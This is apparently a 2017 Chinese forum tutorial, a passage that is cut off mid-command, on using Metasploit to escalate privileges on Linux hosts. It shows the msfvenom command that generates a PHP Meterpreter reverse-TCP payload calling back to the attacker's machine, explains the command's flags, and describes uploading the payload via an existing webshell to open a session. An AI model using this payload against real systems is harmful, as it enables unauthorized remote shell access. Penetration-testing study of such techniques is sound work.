msf php脚本提权,利用Metasploit提权Linux主机思路

本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑

大晚上的写个文章不容易而且有点小冷

利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell  打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题

PHP Meterpreter

metasploit有一个名为PHP Meterpreter的payload，可创建具有meterpreter功能的PHP webshell。

Metasploit的msfVENOM工具可以制作PHP Meterpreter

我们先用msf来生成一个msf php马子

[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=本机ip -f raw >/root/桌面/test.php

这里我来给各位解释一下

[AppleScript] 纯文本查看 复制代码-p 设置payload

-f 设置输出文件格式

本机ip是在内网中 你的kali主机的ip地址 我们可以通过 ifconfig 命令来查看

2017-02-25 03-45-37屏幕截图.png (183.08 KB, 下载次数: 66)

2017-2-25 03:45 上传

由此可见我在内网中 我本机kali的ip地址是192.168.0.3那么我们来执行

[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/r